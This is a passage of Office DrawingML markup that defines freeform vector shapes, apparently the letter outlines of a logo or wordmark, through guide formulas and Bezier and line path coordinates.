                    <a:gd name="T12" fmla="*/ 7 w 32"/>
                    <a:gd name="T13" fmla="*/ 17 h 34"/>
                    <a:gd name="T14" fmla="*/ 16 w 32"/>
                    <a:gd name="T15" fmla="*/ 6 h 34"/>
                    <a:gd name="T16" fmla="*/ 25 w 32"/>
                    <a:gd name="T17" fmla="*/ 17 h 34"/>
                    <a:gd name="T18" fmla="*/ 16 w 32"/>
                    <a:gd name="T19" fmla="*/ 28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34">
                      <a:moveTo>
                        <a:pt x="16" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="26"/>
                        <a:pt x="6" y="34"/>
                        <a:pt x="16" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="34"/>
                        <a:pt x="32" y="26"/>
                        <a:pt x="32" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="7"/>
                        <a:pt x="26" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="16" y="28"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="28"/>
                        <a:pt x="7" y="22"/>
                        <a:pt x="7" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="11"/>
                        <a:pt x="9" y="6"/>
                        <a:pt x="16" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="6"/>
                        <a:pt x="25" y="11"/>
                        <a:pt x="25" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="22"/>
                        <a:pt x="22" y="28"/>
                        <a:pt x="16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87" name="Freeform 49">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BAC3A94-8E27-4648-BE46-A10EAC0AF0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25062" y="24379261"/>
                  <a:ext cx="152400" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 48 w 96"/>
                    <a:gd name="T1" fmla="*/ 59 h 86"/>
                    <a:gd name="T2" fmla="*/ 48 w 96"/>
                    <a:gd name="T3" fmla="*/ 59 h 86"/>
                    <a:gd name="T4" fmla="*/ 26 w 96"/>
                    <a:gd name="T5" fmla="*/ 0 h 86"/>
                    <a:gd name="T6" fmla="*/ 0 w 96"/>
                    <a:gd name="T7" fmla="*/ 0 h 86"/>
                    <a:gd name="T8" fmla="*/ 0 w 96"/>
                    <a:gd name="T9" fmla="*/ 86 h 86"/>
                    <a:gd name="T10" fmla="*/ 18 w 96"/>
                    <a:gd name="T11" fmla="*/ 86 h 86"/>
                    <a:gd name="T12" fmla="*/ 18 w 96"/>
                    <a:gd name="T13" fmla="*/ 24 h 86"/>
                    <a:gd name="T14" fmla="*/ 18 w 96"/>
                    <a:gd name="T15" fmla="*/ 24 h 86"/>
                    <a:gd name="T16" fmla="*/ 40 w 96"/>
                    <a:gd name="T17" fmla="*/ 86 h 86"/>
                    <a:gd name="T18" fmla="*/ 56 w 96"/>
                    <a:gd name="T19" fmla="*/ 86 h 86"/>
                    <a:gd name="T20" fmla="*/ 77 w 96"/>
                    <a:gd name="T21" fmla="*/ 24 h 86"/>
                    <a:gd name="T22" fmla="*/ 77 w 96"/>
                    <a:gd name="T23" fmla="*/ 24 h 86"/>
                    <a:gd name="T24" fmla="*/ 77 w 96"/>
                    <a:gd name="T25" fmla="*/ 86 h 86"/>
                    <a:gd name="T26" fmla="*/ 96 w 96"/>
                    <a:gd name="T27" fmla="*/ 86 h 86"/>
                    <a:gd name="T28" fmla="*/ 96 w 96"/>
                    <a:gd name="T29" fmla="*/ 0 h 86"/>
                    <a:gd name="T30" fmla="*/ 66 w 96"/>
                    <a:gd name="T31" fmla="*/ 0 h 86"/>
                    <a:gd name="T32" fmla="*/ 48 w 96"/>
                    <a:gd name="T33" fmla="*/ 59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6" h="86">
                      <a:moveTo>
                        <a:pt x="48" y="59"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="48" y="59"/>
                      </a:ln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86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="40" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="77" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="96" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="5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88" name="Freeform 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D33DDBC8-3048-9D42-B223-FE8DE6F4065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706037" y="24379261"/>
                  <a:ext cx="114300" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 27"/>
                    <a:gd name="T1" fmla="*/ 0 h 32"/>
                    <a:gd name="T2" fmla="*/ 0 w 27"/>
                    <a:gd name="T3" fmla="*/ 0 h 32"/>
                    <a:gd name="T4" fmla="*/ 0 w 27"/>
                    <a:gd name="T5" fmla="*/ 32 h 32"/>
                    <a:gd name="T6" fmla="*/ 8 w 27"/>
                    <a:gd name="T7" fmla="*/ 32 h 32"/>
                    <a:gd name="T8" fmla="*/ 8 w 27"/>
                    <a:gd name="T9" fmla="*/ 21 h 32"/>
                    <a:gd name="T10" fmla="*/ 15 w 27"/>
                    <a:gd name="T11" fmla="*/ 21 h 32"/>
                    <a:gd name="T12" fmla="*/ 27 w 27"/>
                    <a:gd name="T13" fmla="*/ 10 h 32"/>
                    <a:gd name="T14" fmla="*/ 15 w 27"/>
                    <a:gd name="T15" fmla="*/ 0 h 32"/>
                    <a:gd name="T16" fmla="*/ 13 w 27"/>
                    <a:gd name="T17" fmla="*/ 15 h 32"/>
                    <a:gd name="T18" fmla="*/ 8 w 27"/>
                    <a:gd name="T19" fmla="*/ 15 h 32"/>
                    <a:gd name="T20" fmla="*/ 8 w 27"/>
                    <a:gd name="T21" fmla="*/ 5 h 32"/>
                    <a:gd name="T22" fmla="*/ 13 w 27"/>
                    <a:gd name="T23" fmla="*/ 5 h 32"/>
                    <a:gd name="T24" fmla="*/ 20 w 27"/>
                    <a:gd name="T25" fmla="*/ 10 h 32"/>
                    <a:gd name="T26" fmla="*/ 13 w 27"/>
                    <a:gd name="T27" fmla="*/ 15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32">
                      <a:moveTo>
                        <a:pt x="15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21"/>
                        <a:pt x="8" y="21"/>
                        <a:pt x="8" y="21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23" y="21"/>
                        <a:pt x="27" y="15"/>
                        <a:pt x="27" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="5"/>
                        <a:pt x="23" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13" y="15"/>
                      </a:move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7" y="5"/>
                        <a:pt x="20" y="6"/>
                        <a:pt x="20" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="14"/>
                        <a:pt x="17" y="15"/>
                        <a:pt x="13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89" name="Freeform 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE0C126E-4283-6C43-B62A-F31F2CD291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845737" y="24379261"/>
                  <a:ext cx="98425" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 19 w 62"/>
                    <a:gd name="T1" fmla="*/ 0 h 86"/>
                    <a:gd name="T2" fmla="*/ 0 w 62"/>
                    <a:gd name="T3" fmla="*/ 0 h 86"/>
                    <a:gd name="T4" fmla="*/ 0 w 62"/>
                    <a:gd name="T5" fmla="*/ 86 h 86"/>
                    <a:gd name="T6" fmla="*/ 62 w 62"/>
                    <a:gd name="T7" fmla="*/ 86 h 86"/>
                    <a:gd name="T8" fmla="*/ 62 w 62"/>
                    <a:gd name="T9" fmla="*/ 70 h 86"/>
                    <a:gd name="T10" fmla="*/ 19 w 62"/>
                    <a:gd name="T11" fmla="*/ 70 h 86"/>
                    <a:gd name="T12" fmla="*/ 19 w 62"/>
                    <a:gd name="T13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86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0" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="62" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="70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90" name="Rectangle 52">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0926CD5B-9834-7E42-B7EC-AE81C6D3F0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0964799" y="24379261"/>
                  <a:ext cx="34925" cy="1365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91" name="Freeform 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741154D2-2CFD-314B-8E08-804B6E720CD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015599" y="24379261"/>
                  <a:ext cx="136525" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 35 w 86"/>
                    <a:gd name="T1" fmla="*/ 0 h 86"/>
                    <a:gd name="T2" fmla="*/ 0 w 86"/>
                    <a:gd name="T3" fmla="*/ 86 h 86"/>
                    <a:gd name="T4" fmla="*/ 19 w 86"/>
                    <a:gd name="T5" fmla="*/ 86 h 86"/>
                    <a:gd name="T6" fmla="*/ 27 w 86"/>
                    <a:gd name="T7" fmla="*/ 67 h 86"/>
                    <a:gd name="T8" fmla="*/ 59 w 86"/>
                    <a:gd name="T9" fmla="*/ 67 h 86"/>
                    <a:gd name="T10" fmla="*/ 67 w 86"/>
                    <a:gd name="T11" fmla="*/ 86 h 86"/>
                    <a:gd name="T12" fmla="*/ 86 w 86"/>
                    <a:gd name="T13" fmla="*/ 86 h 86"/>
                    <a:gd name="T14" fmla="*/ 54 w 86"/>
                    <a:gd name="T15" fmla="*/ 0 h 86"/>
                    <a:gd name="T16" fmla="*/ 35 w 86"/>
                    <a:gd name="T17" fmla="*/ 0 h 86"/>
                    <a:gd name="T18" fmla="*/ 32 w 86"/>
                    <a:gd name="T19" fmla="*/ 54 h 86"/>
                    <a:gd name="T20" fmla="*/ 43 w 86"/>
                    <a:gd name="T21" fmla="*/ 22 h 86"/>
                    <a:gd name="T22" fmla="*/ 43 w 86"/>
                    <a:gd name="T23" fmla="*/ 22 h 86"/>
                    <a:gd name="T24" fmla="*/ 54 w 86"/>
                    <a:gd name="T25" fmla="*/ 54 h 86"/>
                    <a:gd name="T26" fmla="*/ 32 w 86"/>
                    <a:gd name="T27" fmla="*/ 54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6" h="86">
                      <a:moveTo>
                        <a:pt x="35" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="67"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="59" y="67"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="67" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="86" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="32" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="43" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="43" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="54"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="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92" name="Freeform 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3522F49-A8DB-1E43-8CA4-680C68ADFD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72762" y="24379261"/>
                  <a:ext cx="114300" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 53 w 72"/>
                    <a:gd name="T1" fmla="*/ 56 h 86"/>
                    <a:gd name="T2" fmla="*/ 53 w 72"/>
                    <a:gd name="T3" fmla="*/ 56 h 86"/>
                    <a:gd name="T4" fmla="*/ 19 w 72"/>
                    <a:gd name="T5" fmla="*/ 0 h 86"/>
                    <a:gd name="T6" fmla="*/ 0 w 72"/>
                    <a:gd name="T7" fmla="*/ 0 h 86"/>
                    <a:gd name="T8" fmla="*/ 0 w 72"/>
                    <a:gd name="T9" fmla="*/ 86 h 86"/>
                    <a:gd name="T10" fmla="*/ 16 w 72"/>
                    <a:gd name="T11" fmla="*/ 86 h 86"/>
                    <a:gd name="T12" fmla="*/ 16 w 72"/>
                    <a:gd name="T13" fmla="*/ 27 h 86"/>
                    <a:gd name="T14" fmla="*/ 16 w 72"/>
                    <a:gd name="T15" fmla="*/ 27 h 86"/>
                    <a:gd name="T16" fmla="*/ 53 w 72"/>
                    <a:gd name="T17" fmla="*/ 86 h 86"/>
                    <a:gd name="T18" fmla="*/ 72 w 72"/>
                    <a:gd name="T19" fmla="*/ 86 h 86"/>
                    <a:gd name="T20" fmla="*/ 72 w 72"/>
                    <a:gd name="T21" fmla="*/ 0 h 86"/>
                    <a:gd name="T22" fmla="*/ 53 w 72"/>
                    <a:gd name="T23" fmla="*/ 0 h 86"/>
                    <a:gd name="T24" fmla="*/ 53 w 72"/>
                    <a:gd name="T25" fmla="*/ 5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2" h="86">
                      <a:moveTo>
                        <a:pt x="53" y="56"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="53" y="56"/>
                      </a:ln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86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="72" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="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93" name="Freeform 55">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C5EF914-CDBD-154F-B07C-4087D56EE8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12462" y="24379261"/>
                  <a:ext cx="109538" cy="136525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 69"/>
                    <a:gd name="T1" fmla="*/ 16 h 86"/>
                    <a:gd name="T2" fmla="*/ 24 w 69"/>
                    <a:gd name="T3" fmla="*/ 16 h 86"/>
                    <a:gd name="T4" fmla="*/ 24 w 69"/>
                    <a:gd name="T5" fmla="*/ 86 h 86"/>
                    <a:gd name="T6" fmla="*/ 45 w 69"/>
                    <a:gd name="T7" fmla="*/ 86 h 86"/>
                    <a:gd name="T8" fmla="*/ 45 w 69"/>
                    <a:gd name="T9" fmla="*/ 16 h 86"/>
                    <a:gd name="T10" fmla="*/ 69 w 69"/>
                    <a:gd name="T11" fmla="*/ 16 h 86"/>
                    <a:gd name="T12" fmla="*/ 69 w 69"/>
                    <a:gd name="T13" fmla="*/ 0 h 86"/>
                    <a:gd name="T14" fmla="*/ 0 w 69"/>
                    <a:gd name="T15" fmla="*/ 0 h 86"/>
                    <a:gd name="T16" fmla="*/ 0 w 69"/>
                    <a:gd name="T17" fmla="*/ 1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9" h="86">
                      <a:moveTo>
                        <a:pt x="0" y="16"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="24" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45" y="86"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="45" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="16"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0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94" name="Freeform 56">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90441E4C-155A-1A41-95D8-CAD078F4934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215499" y="23901424"/>
                  <a:ext cx="376238" cy="401638"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 89"/>
                    <a:gd name="T1" fmla="*/ 47 h 95"/>
                    <a:gd name="T2" fmla="*/ 43 w 89"/>
                    <a:gd name="T3" fmla="*/ 0 h 95"/>
                    <a:gd name="T4" fmla="*/ 0 w 89"/>
                    <a:gd name="T5" fmla="*/ 0 h 95"/>
                    <a:gd name="T6" fmla="*/ 0 w 89"/>
                    <a:gd name="T7" fmla="*/ 95 h 95"/>
                    <a:gd name="T8" fmla="*/ 43 w 89"/>
                    <a:gd name="T9" fmla="*/ 95 h 95"/>
                    <a:gd name="T10" fmla="*/ 89 w 89"/>
                    <a:gd name="T11" fmla="*/ 47 h 95"/>
                    <a:gd name="T12" fmla="*/ 27 w 89"/>
                    <a:gd name="T13" fmla="*/ 72 h 95"/>
                    <a:gd name="T14" fmla="*/ 27 w 89"/>
                    <a:gd name="T15" fmla="*/ 22 h 95"/>
                    <a:gd name="T16" fmla="*/ 38 w 89"/>
                    <a:gd name="T17" fmla="*/ 22 h 95"/>
                    <a:gd name="T18" fmla="*/ 62 w 89"/>
                    <a:gd name="T19" fmla="*/ 49 h 95"/>
                    <a:gd name="T20" fmla="*/ 42 w 89"/>
                    <a:gd name="T21" fmla="*/ 72 h 95"/>
                    <a:gd name="T22" fmla="*/ 27 w 89"/>
                    <a:gd name="T23" fmla="*/ 7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95">
                      <a:moveTo>
                        <a:pt x="89" y="47"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="18"/>
                        <a:pt x="71" y="0"/>
                        <a:pt x="4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95"/>
                        <a:pt x="0" y="95"/>
                        <a:pt x="0" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="95"/>
                        <a:pt x="43" y="95"/>
                        <a:pt x="43" y="95"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="95"/>
                        <a:pt x="89" y="76"/>
                        <a:pt x="89" y="47"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="27" y="72"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="22"/>
                        <a:pt x="27" y="22"/>
                        <a:pt x="27" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="22"/>
                        <a:pt x="38" y="22"/>
                        <a:pt x="38" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="22"/>
                        <a:pt x="62" y="30"/>
                        <a:pt x="62" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="64"/>
                        <a:pt x="54" y="72"/>
                        <a:pt x="42" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="27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95" name="Freeform 57">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CADA4A18-0FF9-4246-88E7-56BE11A6B1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55237" y="23891899"/>
                  <a:ext cx="360363" cy="420688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 55 w 85"/>
                    <a:gd name="T1" fmla="*/ 39 h 99"/>
                    <a:gd name="T2" fmla="*/ 53 w 85"/>
                    <a:gd name="T3" fmla="*/ 38 h 99"/>
                    <a:gd name="T4" fmla="*/ 29 w 85"/>
                    <a:gd name="T5" fmla="*/ 28 h 99"/>
                    <a:gd name="T6" fmla="*/ 40 w 85"/>
                    <a:gd name="T7" fmla="*/ 21 h 99"/>
                    <a:gd name="T8" fmla="*/ 55 w 85"/>
                    <a:gd name="T9" fmla="*/ 32 h 99"/>
                    <a:gd name="T10" fmla="*/ 55 w 85"/>
                    <a:gd name="T11" fmla="*/ 34 h 99"/>
                    <a:gd name="T12" fmla="*/ 82 w 85"/>
                    <a:gd name="T13" fmla="*/ 34 h 99"/>
                    <a:gd name="T14" fmla="*/ 82 w 85"/>
                    <a:gd name="T15" fmla="*/ 31 h 99"/>
                    <a:gd name="T16" fmla="*/ 41 w 85"/>
                    <a:gd name="T17" fmla="*/ 0 h 99"/>
                    <a:gd name="T18" fmla="*/ 3 w 85"/>
                    <a:gd name="T19" fmla="*/ 30 h 99"/>
                    <a:gd name="T20" fmla="*/ 33 w 85"/>
                    <a:gd name="T21" fmla="*/ 58 h 99"/>
                    <a:gd name="T22" fmla="*/ 39 w 85"/>
                    <a:gd name="T23" fmla="*/ 59 h 99"/>
                    <a:gd name="T24" fmla="*/ 58 w 85"/>
                    <a:gd name="T25" fmla="*/ 69 h 99"/>
                    <a:gd name="T26" fmla="*/ 43 w 85"/>
                    <a:gd name="T27" fmla="*/ 77 h 99"/>
                    <a:gd name="T28" fmla="*/ 26 w 85"/>
                    <a:gd name="T29" fmla="*/ 64 h 99"/>
                    <a:gd name="T30" fmla="*/ 26 w 85"/>
                    <a:gd name="T31" fmla="*/ 61 h 99"/>
                    <a:gd name="T32" fmla="*/ 0 w 85"/>
                    <a:gd name="T33" fmla="*/ 61 h 99"/>
                    <a:gd name="T34" fmla="*/ 0 w 85"/>
                    <a:gd name="T35" fmla="*/ 64 h 99"/>
                    <a:gd name="T36" fmla="*/ 9 w 85"/>
                    <a:gd name="T37" fmla="*/ 87 h 99"/>
                    <a:gd name="T38" fmla="*/ 43 w 85"/>
                    <a:gd name="T39" fmla="*/ 99 h 99"/>
                    <a:gd name="T40" fmla="*/ 85 w 85"/>
                    <a:gd name="T41" fmla="*/ 67 h 99"/>
                    <a:gd name="T42" fmla="*/ 55 w 85"/>
                    <a:gd name="T43" fmla="*/ 3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5" h="99">
                      <a:moveTo>
                        <a:pt x="55" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="38"/>
                        <a:pt x="53" y="38"/>
                        <a:pt x="53" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="33"/>
                        <a:pt x="29" y="32"/>
                        <a:pt x="29" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="21"/>
                        <a:pt x="38" y="21"/>
                        <a:pt x="40" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="21"/>
                        <a:pt x="55" y="24"/>
                        <a:pt x="55" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="34"/>
                        <a:pt x="55" y="34"/>
                        <a:pt x="55" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="34"/>
                        <a:pt x="82" y="34"/>
                        <a:pt x="82" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="31"/>
                        <a:pt x="82" y="31"/>
                        <a:pt x="82" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="12"/>
                        <a:pt x="66" y="0"/>
                        <a:pt x="41" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="0"/>
                        <a:pt x="3" y="10"/>
                        <a:pt x="3" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="50"/>
                        <a:pt x="23" y="55"/>
                        <a:pt x="33" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="58"/>
                        <a:pt x="37" y="59"/>
                        <a:pt x="39" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="62"/>
                        <a:pt x="58" y="64"/>
                        <a:pt x="58" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="77"/>
                        <a:pt x="47" y="77"/>
                        <a:pt x="43" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="77"/>
                        <a:pt x="26" y="76"/>
                        <a:pt x="26" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="61"/>
                        <a:pt x="26" y="61"/>
                        <a:pt x="26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0" y="73"/>
                        <a:pt x="3" y="81"/>
                        <a:pt x="9" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="95"/>
                        <a:pt x="29" y="99"/>
                        <a:pt x="43" y="99"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="68" y="99"/>
                        <a:pt x="85" y="86"/>
                        <a:pt x="85" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="45"/>
                        <a:pt x="63" y="40"/>
                        <a:pt x="55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96" name="Freeform 58">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69B98729-4533-1D4E-BCC9-87C2A1C792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071162" y="23891899"/>
                  <a:ext cx="360363" cy="420688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 43 w 85"/>
                    <a:gd name="T1" fmla="*/ 99 h 99"/>
                    <a:gd name="T2" fmla="*/ 85 w 85"/>
                    <a:gd name="T3" fmla="*/ 67 h 99"/>
                    <a:gd name="T4" fmla="*/ 55 w 85"/>
                    <a:gd name="T5" fmla="*/ 39 h 99"/>
                    <a:gd name="T6" fmla="*/ 52 w 85"/>
                    <a:gd name="T7" fmla="*/ 38 h 99"/>
                    <a:gd name="T8" fmla="*/ 29 w 85"/>
                    <a:gd name="T9" fmla="*/ 28 h 99"/>
                    <a:gd name="T10" fmla="*/ 40 w 85"/>
                    <a:gd name="T11" fmla="*/ 21 h 99"/>
                    <a:gd name="T12" fmla="*/ 55 w 85"/>
                    <a:gd name="T13" fmla="*/ 32 h 99"/>
                    <a:gd name="T14" fmla="*/ 55 w 85"/>
                    <a:gd name="T15" fmla="*/ 34 h 99"/>
                    <a:gd name="T16" fmla="*/ 82 w 85"/>
                    <a:gd name="T17" fmla="*/ 34 h 99"/>
                    <a:gd name="T18" fmla="*/ 82 w 85"/>
                    <a:gd name="T19" fmla="*/ 31 h 99"/>
                    <a:gd name="T20" fmla="*/ 41 w 85"/>
                    <a:gd name="T21" fmla="*/ 0 h 99"/>
                    <a:gd name="T22" fmla="*/ 3 w 85"/>
                    <a:gd name="T23" fmla="*/ 30 h 99"/>
                    <a:gd name="T24" fmla="*/ 33 w 85"/>
                    <a:gd name="T25" fmla="*/ 58 h 99"/>
                    <a:gd name="T26" fmla="*/ 39 w 85"/>
                    <a:gd name="T27" fmla="*/ 59 h 99"/>
                    <a:gd name="T28" fmla="*/ 58 w 85"/>
                    <a:gd name="T29" fmla="*/ 69 h 99"/>
                    <a:gd name="T30" fmla="*/ 43 w 85"/>
                    <a:gd name="T31" fmla="*/ 77 h 99"/>
                    <a:gd name="T32" fmla="*/ 26 w 85"/>
                    <a:gd name="T33" fmla="*/ 64 h 99"/>
                    <a:gd name="T34" fmla="*/ 26 w 85"/>
                    <a:gd name="T35" fmla="*/ 61 h 99"/>
                    <a:gd name="T36" fmla="*/ 0 w 85"/>
                    <a:gd name="T37" fmla="*/ 61 h 99"/>
                    <a:gd name="T38" fmla="*/ 0 w 85"/>
                    <a:gd name="T39" fmla="*/ 64 h 99"/>
